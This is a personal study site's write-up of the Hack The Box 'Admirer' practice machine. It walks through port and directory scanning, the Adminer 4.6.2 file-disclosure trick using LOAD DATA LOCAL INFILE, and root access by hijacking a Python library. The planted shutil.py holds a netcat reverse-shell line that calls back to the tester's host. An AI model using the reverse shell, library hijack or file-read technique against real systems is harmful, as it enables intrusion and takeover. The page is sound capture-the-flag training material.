VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
      • Theory
        • Nmap
        • Wireless
        • OSI Model - TCP/IP
        • R* Service
        • Hash
        • Solaris
        • SIP
        • Cisco Password Encryption
        • Time to Live
        • Windows
          • WMIC
          • IIS Version
          • Windows Version
          • Active Directory
        • Linux
        • Database
          • Page 7
          • MSSQL
          • PostgreSQL
          • MySQL
        • Asymmetric Encryption
        • Symmetric Encryption
        • Tools
        • ICMP
        • IP Address
        • VLAN
        • Acronyms
        • HTTP Status
        • HTTP Method
        • Protocol
        • Common Ports
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Lesson Learn
  • Report-Penetration
  • Reconnaissance
  • Enumeration
  • Port 21 vsftpd 3.0.3
  • Port 80 Apache 2.4.25 (Debian)
  • Exploitation
  • Privilege Escalation
  • Reference Link
  1. Course Review
  2. Cyber Security Courses Journey
  3. OSCP Journey
  4. CTF
  5. Hack The Box
  6. Linux Boxes

Admirer (Easy)

PreviousLinux BoxesNextBashed (Easy)

Last updated 2 years ago

Lesson Learn

Report-Penetration

Vulnerable Exploit: Adminer 4.6.2 File Disclosure Vulnerability

System Vulnerable: 10.10.10.187

Vulnerability Explanation: Adminer versions up to (and including) 4.6.2 supported the use of the SQL statement LOAD DATA INFILE. It was possible to use this SQL statement to read arbitrary local files because of a protocol flaw in MySQL.

Privilege Escalation Vulnerability: Misconfigure privilege of user and Hijack Python Library

Vulnerability Fix: Upgrade to the latest version of Adminer. This vulnerability was fixed in Adminer version 4.6.3.

Severity: High

Step to Compromise the Host:

Reconnaissance

nmap -sC -sV -p- -T4 10.10.10.187

Enumeration

Let's start to enumerate each service if any of these services are either contain vulnerable versions or misconfigured.

Port 21 vsftpd 3.0.3

Try to log in with anonymous it doesn't work as well as there is no interesting vulnerability for us.

Port 80 Apache 2.4.25 (Debian)

As a result of the Nmap scan, we have found the file robots.txt and directory admin-dir.

By following the file robots.txt, we found some hints that directory /admin-dir contacts personal contacts and cred as well as username waldo. Unfortunately, we don't have permission to access it.

Let's start to enumerate and perform directory traversal by gobuster to check if there is any file or directory which we can access.

gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.187/admin-dir
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
2021/10/27 10:43:25 Starting gobuster in directory enumeration mode
===============================================================
/contacts.txt         (Status: 200) [Size: 350]
/credentials.txt      (Status: 200) [Size: 136]
                                               
===============================================================
2021/10/27 11:07:47 Finished
===============================================================

We have found the same as the hint provided by file contacts.txt and credentials.txt.

With all of these credentials, we found valid credentials for access to ftp service. On ftp service, we found 2 files dump.sql and html.tar.gz.

By enumerating on file dump.sql, we didn't see any interesting information. Then, extract the file html.tar.gz which contains some folders and files.

# xzfv = Extract Zip File Verbose
tar xzfv html.tar.gz

By enumerating on each file and folder, we found credentials stored on file index.php and /utility-scripts/db_admin.php.

As we didn't found any database port was open on nmap scan. Which mean that, there will be database web portal somewhere. By browsing folder utility-scripts we got Forbidden.

But while include info.php which we have downloaded from ftp service, we return back the info.

By searching on google for the machine's name, we found out that there is a database whose name is similar to our machine.

Then, we found the database login web page of adminer.php with version 4.6.2.

Exploitation

First, let's configure our MySQL on our kali machine. We will create a database name, username, and password, and allow the host to connect.

Create database, username, and password for the specific host.

Creating a table of the database name Testing.

Change configuration from allowing access only to the local host to any host connected to MySQL database.

After changing the configuration, we need to restart MySQL service.

sudo service mysql restart

Let's connect from the database web portal to our database with the credentials that we have created.

By executing the exploit SQL command to read file /var/www/html/index.php, it's going to query the row 123s

LOAD DATA LOCAL INFILE 'var/www/html/index.php' INTO TABLE Testing FIELDS TERMINATED BY "\n" 

As we see the Query was executed. Let's get back to our database and display the table Testing. We found out there are other credentials with the same username as waldo.

show databases;
use Testing;
show tables;
select * from Testing;

For our previous credentials, we found it doesn't valid on the ssh service. But for this one, it's working on ssh. We can log in ssh to the machine and we got a shell on the machine.

Privilege Escalation

Check for sudo -l to check if there is any misconfigure. We can run /script root privilege.

On file backup.py, we found that it's imported file shutil and make_archive function with 3 parameters (a, b, c).

Let's check on the file admin_tasks.sh and we found backup_web() functions which is interesting.

backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}

To exploit this misconfigure, we will create a reverse shell code and save it as shutil.py.

import os,socket,subprocess

def make_archive(a, b, c):
    os.system("nc -e /bin/bash 10.10.14.31 5555")

Let's start listening on port 5555 with netcat.

nc -lvp 5555

Then, we export the PYTHONPATH to our /tmp folder which we create file shutil.py. Next, we will run /opt/scripts/admin_tasks.sh with root privilege and select option 6 (Backup Web Data).

Once we executed admin_tasks script, it will run backup.py file and import our exploit code on shutil.py and execute our reverse shell command.

Reference Link

We found that Adminer 4.6.2 is vulnerable to file disclosure. at the end.

👨‍🎓
🚩
✅
https://www.acunetix.com/vulnerabilities/web/adminer-4-6-2-file-disclosure-vulnerability/
https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f
https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html
#Reference Link
Web page on port 80
/utility-scripts/db_admin.php
index.php
Start Service MySQL on Kali Machine
By default allow only Localhost IP connect
Change configuration to allow any host to connect